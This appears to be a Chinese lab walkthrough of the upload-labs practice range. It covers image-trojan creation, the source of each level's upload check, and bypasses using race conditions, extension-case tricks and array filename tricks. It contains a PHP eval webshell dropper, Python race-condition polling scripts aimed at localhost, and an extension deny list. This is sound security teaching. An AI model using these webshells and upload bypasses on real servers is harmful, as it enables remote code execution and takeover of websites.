web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学（3）

<制作图片马>

制作图片马有两种方法，一种是文本方式打开，末尾粘贴一句话木马，令一种是使用命令进行合成。

• 方法1

首先准备好一个图片（这里是1.png）。

将一个图片以文本格式打开（这里用的Notepad++，以记事本方式打开修改也能连接成功，不过修改后图片无法正常显示了）。

后面粘贴上一句话木马。

图片依然可以正常打开。

• 方法2

首先准备好一个图片（这里是1.png）。

再准备好一个一句话木马（这里是2.php）。

打开命令提示符，首先进入上面两个文件存放的路径。

cd C:\Users\WYR\Desktop

使用下面的命令进行图片马合成。

copy 1.png/b + 2.php/a 3.png

图片依然可以正常打开。

1. 提示：
2. 本pass检查图标内容开头2个字节！
4. 原码：
5. function getReailFileType($filename){
6. $file = fopen($filename, "rb");
7. $bin = fread($file, 2); //只读2字节
8. fclose($file);
9. $strInfo = @unpack("C2chars", $bin);
10. $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
11. $fileType = '';
12. switch($typeCode){
13. case 255216:
14. $fileType = 'jpg';
15. break;
16. case 13780:
17. $fileType = 'png';
18. break;
19. case 7173:
20. $fileType = 'gif';
21. break;
22. default:
23. $fileType = 'unknown';
24. }
25. return $fileType;
26. }
28. $is_upload = false;
29. $msg = null;
30. if(isset($_POST['submit'])){
31. $temp_file = $_FILES['upload_file']['tmp_name'];
32. $file_type = getReailFileType($temp_file);
34. if($file_type == 'unknown'){
35. $msg = "文件未知，上传失败！";
36. }else{
37. $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
38. if(move_uploaded_file($temp_file,$img_path)){
39. $is_upload = true;
40. } else {
41. $msg = "上传出错！";
42. }
43. }
44. }

分析源码可知此源代码是验证前缀（文件头信息）。

首先将上面创建的图片马进行上传。

上传成功。

右键点击图片复制图片路径。

点击“文件包含漏洞”进入测试网页运行图片马中的恶意代码进行测试。

在测试网页内的网址后添加上传的文件马的路径，然后回车运行。

上半部分是图片内容，下半部分是一句话木马返回的内容。

+getimagesize()函数

1. 提示：
2. 本pass使用getimagesize()检查是否为图片文件！
4. 原码：
5. function isImage($filename){
6. $types = '.jpeg|.png|.gif';
7. if(file_exists($filename)){
8. $info = getimagesize($filename);
9. $ext = image_type_to_extension($info[2]);
10. if(stripos($types,$ext)>=0){
11. return $ext;
12. }else{
13. return false;
14. }
15. }else{
16. return false;
17. }
18. }
20. $is_upload = false;
21. $msg = null;
22. if(isset($_POST['submit'])){
23. $temp_file = $_FILES['upload_file']['tmp_name'];
24. $res = isImage($temp_file);
25. if(!$res){
26. $msg = "文件未知，上传失败！";
27. }else{
28. $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
29. if(move_uploaded_file($temp_file,$img_path)){
30. $is_upload = true;
31. } else {
32. $msg = "上传出错！";
33. }
34. }
35. }

分析源码可知存在如下语句进行验证。

$info = getimagesize($filename);

此语句就是一个检测，如果上传的文件是php格式就得不到图片的尺寸，就会返回错误，后面的代码就无法执行，文件就没办法成功上传。

此关同通关方法一样，均是将图片马上传之后，结合文件包含漏洞进行绕过，进入测试网页进行测试后，均可执行php后门代码。

---

知识补充：

getimagesize()函数用于获取图像大小及相关信息，成功返回一个数组，失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。

1. 语法格式：
2. array getimagesize ( string $filename [, array &$imageinfo ] )

getimagesize() 函数将测定任何 GIF，JPG，PNG，SWF，SWC，PSD，TIFF，BMP，IFF，JP2，JPX，JB2，JPC，XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。

---

+exif_imagetype()函数

1. 提示：
2. 本pass使用exif_imagetype()检查是否为图片文件！
4. 原码：
5. function isImage($filename){
6. //需要开启php_exif模块
7. $image_type = exif_imagetype($filename);
8. switch ($image_type) {
9. case IMAGETYPE_GIF:
10. return "gif";
11. break;
12. case IMAGETYPE_JPEG:
13. return "jpg";
14. break;
15. case IMAGETYPE_PNG:
16. return "png";
17. break;
18. default:
19. return false;
20. break;
21. }
22. }
24. $is_upload = false;
25. $msg = null;
26. if(isset($_POST['submit'])){
27. $temp_file = $_FILES['upload_file']['tmp_name'];
28. $res = isImage($temp_file);
29. if(!$res){
30. $msg = "文件未知，上传失败！";
31. }else{
32. $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
33. if(move_uploaded_file($temp_file,$img_path)){
34. $is_upload = true;
35. } else {
36. $msg = "上传出错！";
37. }
38. }
39. }

分析源码可知存在如下语句进行验证。

$image_type = exif_imagetype($filename);

此语句就是一个检测，如果上传的文件是php格式不是图片，就会返回错误，后面的代码就无法执行，文件就没办法成功上传。

此关同通关方法一样，均是将图片马上传之后，结合文件包含漏洞进行绕过，进入测试网页进行测试后，均可执行php后门代码。

---

知识补充：

exif_imagetype()函数是PHP中的内置函数，用于确定图像的类型。

1. 语法格式：
2. intexif_imagetype( string $filename )

该函数接受单个参数$filename，该参数保存图像的名称或URL。

---

+imagecreatefrom 系列函数

1. 提示：
2. 本pass重新渲染了图片！
4. 原码：
5. $is_upload = false;
6. $msg = null;
7. if (isset($_POST['submit'])){
8. // 获得上传文件的基本信息，文件名，类型，大小，临时文件路径
9. $filename = $_FILES['upload_file']['name'];
10. $filetype = $_FILES['upload_file']['type'];
11. $tmpname = $_FILES['upload_file']['tmp_name'];
13. $target_path=UPLOAD_PATH.'/'.basename($filename);
15. // 获得上传文件的扩展名
16. $fileext= substr(strrchr($filename,"."),1);
18. //判断文件后缀与类型，合法才进行上传操作
19. if(($fileext == "jpg") && ($filetype=="image/jpeg")){
20. if(move_uploaded_file($tmpname,$target_path)){
21. //使用上传的图片生成新的图片
22. $im = imagecreatefromjpeg($target_path);
24. if($im == false){
25. $msg = "该文件不是jpg格式的图片！";
26. @unlink($target_path);
27. }else{
28. //给新图片指定文件名
29. srand(time());
30. $newfilename = strval(rand()).".jpg";
31. //显示二次渲染后的图片（使用用户上传图片生成的新图片）
32. $img_path = UPLOAD_PATH.'/'.$newfilename;
33. imagejpeg($im,$img_path);
34. @unlink($target_path);
35. $is_upload = true;
36. }
37. } else {
38. $msg = "上传出错！";
39. }
41. }else if(($fileext == "png") && ($filetype=="image/png")){
42. if(move_uploaded_file($tmpname,$target_path)){
43. //使用上传的图片生成新的图片
44. $im = imagecreatefrompng($target_path);
46. if($im == false){
47. $msg = "该文件不是png格式的图片！";
48. @unlink($target_path);
49. }else{
50. //给新图片指定文件名
51. srand(time());
52. $newfilename = strval(rand()).".png";
53. //显示二次渲染后的图片（使用用户上传图片生成的新图片）
54. $img_path = UPLOAD_PATH.'/'.$newfilename;
55. imagepng($im,$img_path);
57. @unlink($target_path);
58. $is_upload = true;
59. }
60. } else {
61. $msg = "上传出错！";
62. }
64. }else if(($fileext == "gif") && ($filetype=="image/gif")){
65. if(move_uploaded_file($tmpname,$target_path)){
66. //使用上传的图片生成新的图片
67. $im = imagecreatefromgif($target_path);
68. if($im == false){
69. $msg = "该文件不是gif格式的图片！";
70. @unlink($target_path);
71. }else{
72. //给新图片指定文件名
73. srand(time());
74. $newfilename = strval(rand()).".gif";
75. //显示二次渲染后的图片（使用用户上传图片生成的新图片）
76. $img_path = UPLOAD_PATH.'/'.$newfilename;
77. imagegif($im,$img_path);
79. @unlink($target_path);
80. $is_upload = true;
81. }
82. } else {
83. $msg = "上传出错！";
84. }
85. }else{
86. $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件！";
87. }
88. }

分析源码可知存在如下语句进行验证。

1. $im = imagecreatefromjpeg($target_path);
2. $im = imagecreatefrompng($target_path);
3. $im = imagecreatefromgif($target_path);

此关同通关方法一样，均是将图片马上传之后，结合文件包含漏洞进行绕过，进入测试网页进行测试后，均可执行php后门代码。

---

知识补充：

imagecreatefrom 系列函数用于从文件或 URL 载入一幅图像，成功返回图像资源，失败则返回一个空字符串。

该系列函数有：

imagecreatefromgif()：创建一块画布，并从 GIF 文件或 URL 地址载入一副图像

imagecreatefromjpeg()：创建一块画布，并从 JPEG 文件或 URL 地址载入一副图像

imagecreatefrompng()：创建一块画布，并从 PNG 文件或 URL 地址载入一副图像

imagecreatefromwbmp()：创建一块画布，并从 WBMP 文件或 URL 地址载入一副图像

imagecreatefromstring()：创建一块画布，并从字符串中的图像流新建一副图像

1. 语法格式：
2. resource imagecreatefromgif(string filename)
3. resource imagecreatefromjpeg(string filename)
4. resource imagecreatefrompng(string filename)
5. resource imagecreatefromwbmp(string filename)
6. resource imagecreatefromstring(string image)

---

+move_uploaded_file()函数

1. 提示：
2. 需要代码审计！
4. 原码：
5. $is_upload = false;
6. $msg = null;
8. if(isset($_POST['submit'])){
9. $ext_arr = array('jpg','png','gif');
10. $file_name = $_FILES['upload_file']['name'];
11. $temp_file = $_FILES['upload_file']['tmp_name'];
12. $file_ext = substr($file_name,strrpos($file_name,".")+1);
13. $upload_file = UPLOAD_PATH . '/' . $file_name;
15. if(move_uploaded_file($temp_file, $upload_file)){
16. if(in_array($file_ext,$ext_arr)){
17. $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
18. rename($upload_file, $img_path);
19. $is_upload = true;
20. }else{
21. $msg = "只允许上传.jpg|.png|.gif类型文件！";
22. unlink($upload_file);
23. }
24. }else{
25. $msg = '上传出错！';
26. }
27. }

此关涉及到了二次渲染的知识，比如我们平时在进行文件上传时，在我们上传文件后，网站会对图片进行二次处理（格式、尺寸、保存、删除要求等），服务器会把里面的内容进行替换更新，处理完成后，根据我们原有的图片生成一个新的图片（标准化）并放到网站对应的标签进行显示。

而二次渲染可能会存在逻辑漏洞，就是它验证的地方是在第一步还是在第二步。

还涉及到条件竞争的知识，我们在日常生活里使用电脑可以发现，如果文件正在被使用或者查看，就无法对文件进行删除或者文件名修改等操作。

此关先创建了一个只包含图片文件的白名单，随后提取出文件的后缀名，将文件移动至上传目录后才判断文件是否合法，不合法就删除。

因此可以利用这两点，不停且迅速地上传、访问文件（可以使用使用BURP和Python脚本来实现），网站的代码就不能完成对上传文件的名称的修改，可以利用这一点防止php后缀被更改导致php代码不能正常运行。

操作流程：

1. Python脚本（可用可不用，可以手动进行）：
2. import requests
3. url="http://127.0.0.1/upload-labs/upload/shell.php"
4. while True:
5. web_result=requests.get(url)
6. if web_result.status_code == 200:
7. print("Success")
8. break
9. else:
10. print("Failed")

1. 2.php内容：
2. <?php phpinfo();?>

上传一句话木马文件后使用BURP抓包，右键数据包后，点击“Send to Intruder”发送至“Intruder”（或者使用键盘的Ctrl+I键）。

点击“Intruder”后点击“Positions”，然后点击“Clear”。

点击“Payloads”后，设置“Payload type”为“Null payloads”，设置“Payload Options”为“Continue indefinitely”。

进行完上面设置后，点击“Start attack”来开始不断上传该文件。

此时如果查看“upload”目录可以看到一句话木马文件会不断出现、消失、出现、消失...

然后可以选择运行脚本来不断访问该文件，也可以打开另一个浏览器输入文件路径后手动对文件进行访问。

这里展示手动访问，不断刷新网页后到某一时刻可以成功得到一句话木马执行后返回的页面。

---

知识补充：

move_uploaded_file() 函数把上传的文件移动到新位置。

如果成功该函数返回 TRUE，如果失败则返回 FALSE。

1. 语法格式：
2. move_uploaded_file(file,newloc)

参数	描述
file	必需。规定要移动的文件。
newloc	必需。规定文件的新位置。

提示和注释：

注释1：该函数仅用于通过 HTTP POST 上传的文件。

注释2：如果目标文件已经存在，将会被覆盖。

---

1. 提示：
2. 需要代码审计！
4. 原码：
5. //index.php
6. $is_upload = false;
7. $msg = null;
8. if (isset($_POST['submit']))
9. {
10. require_once("./myupload.php");
11. $imgFileName =time();
12. $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
13. $status_code = $u->upload(UPLOAD_PATH);
14. switch ($status_code) {
15. case 1:
16. $is_upload = true;
17. $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
18. break;
19. case 2:
20. $msg = '文件已经被上传，但没有重命名。';
21. break;
22. case -1:
23. $msg = '这个文件不能上传到服务器的临时文件存储目录。';
24. break;
25. case -2:
26. $msg = '上传失败，上传目录不可写。';
27. break;
28. case -3:
29. $msg = '上传失败，无法上传该类型文件。';
30. break;
31. case -4:
32. $msg = '上传失败，上传的文件过大。';
33. break;
34. case -5:
35. $msg = '上传失败，服务器已经存在相同名称文件。';
36. break;
37. case -6:
38. $msg = '文件无法上传，文件不能复制到目标目录。';
39. break;
40. default:
41. $msg = '未知错误！';
42. break;
43. }
44. }
46. //myupload.php
47. class MyUpload{
48. ......
49. ......
50. ......
51. var $cls_arr_ext_accepted = array(
52. ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
53. ".html", ".xml", ".tiff", ".jpeg", ".png" );
55. ......
56. ......
57. ......
58. /** upload()
59. **
60. ** Method to upload the file.
61. ** This is the only method to call outside the class.
62. ** @para String name of directory we upload to
63. ** @returns void
64. **/
65. function upload( $dir ){
67. $ret = $this->isUploadedFile();
69. if( $ret != 1 ){
70. return $this->resultUpload( $ret );
71. }
73. $ret = $this->setDir( $dir );
74. if( $ret != 1 ){
75. return $this->resultUpload( $ret );
76. }
78. $ret = $this->checkExtension();
79. if( $ret != 1 ){
80. return $this->resultUpload( $ret );
81. }
83. $ret = $this->checkSize();
84. if( $ret != 1 ){
85. return $this->resultUpload( $ret );
86. }
88. // if flag to check if the file exists is set to 1
90. if( $this->cls_file_exists == 1 ){
92. $ret = $this->checkFileExists();
93. if( $ret != 1 ){
94. return $this->resultUpload( $ret );
95. }
96. }
98. // if we are here, we are ready to move the file to destination
100. $ret = $this->move();
101. if( $ret != 1 ){
102. return $this->resultUpload( $ret );
103. }
105. // check if we need to rename the file
107. if( $this->cls_rename_file == 1 ){
108. $ret = $this->renameFile();
109. if( $ret != 1 ){
110. return $this->resultUpload( $ret );
111. }
112. }
114. // if we are here, everything worked as planned :)
116. return $this->resultUpload( "SUCCESS" );
118. }
119. ......
120. ......
121. ......
122. };

此关和前一关非常类似，但是Pass-19进行了一个文件名过滤，因此php后缀文件就无法上传了，只能上传图片马，然后结合“文件包含漏洞”进行绕过。

上传文件后，进行白名单检测，移动文件，然后进行重命名。

将文件上传后，对文件重新命名时，同样存在条件竞争的漏洞。可以利用类似方法进行绕过，但是此时访问的地址就是文件包含的那个地址了。

操作流程：

1. Python脚本（可用可不用，可以手动进行）：
2. import requests
3. url = "http://127.0.0.1/upload-labs/include.php?file=upload/pass19.png"
4. while True:
5. html = requests.get(url)
6. if ( 'Warning' not in str(html.text)):
7. print('ok')
8. break

1. 2.php内容：
2. <?php phpinfo();?>
4. 补充：
5. <?php fputs(fopen('Muma.php','w'),'<?php @eval($_POST["Muma"])?>');?>

此关文件上传的路径与前面挂卡的路径不一样，在网站的根目录，为了更加方便，将文件路径仍然改到“upload”下。

上传一句话木马文件后使用BURP抓包，右键数据包后，点击“Send to Intruder”发送至“Intruder”（或者使用键盘的Ctrl+I键）。

点击“Intruder”后点击“Positions”，然后点击“Clear”。

点击“Payloads”后，设置“Payload type”为“Null payloads”，设置“Payload Options”为“Continue indefinitely”。

进行完上面设置后，点击“Start attack”来开始不断上传该文件。

然后可以选择运行脚本来不断访问该文件，也可以打开另一个浏览器输入文件路径后手动对文件进行访问。

这里展示手动访问，不断刷新网页后到某一时刻可以成功得到一句话木马执行后返回的页面，上半部分是图片内容，下半部分是一句话木马执行后返回的内容。

1. 提示：
2. 本pass的取文件名通过$_POST来获取。
4. 原码：
5. $is_upload = false;
6. $msg = null;
7. if (isset($_POST['submit'])) {
8. if (file_exists(UPLOAD_PATH)) {
9. $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
11. $file_name = $_POST['save_name'];
12. $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
14. if(!in_array($file_ext,$deny_ext)) {
15. $temp_file = $_FILES['upload_file']['tmp_name'];
16. $img_path = UPLOAD_PATH . '/' .$file_name;
17. if (move_uploaded_file($temp_file, $img_path)) {
18. $is_upload = true;
19. }else{
20. $msg = '上传出错！';
21. }
22. }else{
23. $msg = '禁止保存为该类型文件！';
24. }
26. } else {
27. $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
28. }
29. }

此关只对保存的文件后缀进行了黑名单检测，未对上传的文件类型做什么判断，其它防护全部没做。所以我们可以有多种方法进行绕过，这里将一种方法。

分析原码可以看出这些黑名单都是小写的形式，也就是说我们完全可以上传一个一句话木马然后将其”保存名称”修改为“.PHP”（改为“.php/.”也可以）后缀即可绕过。

点击上传后发现成功进行了绕过。

访问发现代码可以正常执行。

1. 提示：
2. Pass-20来源于CTF，请审计代码！
4. 原码：
5. $is_upload = false;
6. $msg = null;
7. if(!empty($_FILES['upload_file'])){
8. //检查MIME
9. $allow_type = array('image/jpeg','image/png','image/gif');
10. if(!in_array($_FILES['upload_file']['type'],$allow_type)){
11. $msg = "禁止上传该类型文件!";
12. }else{
13. //检查文件名
14. $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
15. if (!is_array($file)) {
16. $file = explode('.', strtolower($file));
17. }
19. $ext = end($file);
20. $allow_suffix = array('jpg','png','gif');
21. if (!in_array($ext, $allow_suffix)) {
22. $msg = "禁止上传该后缀文件!";
23. }else{
24. $file_name = reset($file) . '.' . $file[count($file) - 1];
25. $temp_file = $_FILES['upload_file']['tmp_name'];
26. $img_path = UPLOAD_PATH . '/' .$file_name;
27. if (move_uploaded_file($temp_file, $img_path)) {
28. $msg = "文件上传成功！";
29. $is_upload = true;
30. } else {
31. $msg = "文件上传失败！";
32. }
33. }
34. }
35. }else{
36. $msg = "请选择要上传的文件！";
37. }

此关存在多重验证。

首先进行白名单验证MIME类型。

然后判断save_name参数是否为空，如果为空就把文件本来的名称赋值给“$file”,如果不为空就将“save_name”参数的值赋给它。

接下来判断“$file”是否是数组。

如果不是数组则将其拆分成数组，然后使用“end（）函数”取出数组最后一个的值，取出后同白名单做比较，如果与“$allow_suffix”中的后缀匹配，就允许继续上传。

之后代码会将数组的值拼接在一起对文件进行重命名。

操作流程：

首先选中要上传的一句话木马文件“2.jpg”。

点击上传使用BURP抓包。

将数据包修改为如下样式。

点击放包后可以在网页内看到文件成功上传了。

访问文件地址可以看到一句话木马成功执行了。

---

至此upload-labs靶场全部关卡通关教程已结束

其它关卡可以参照前两篇文章

---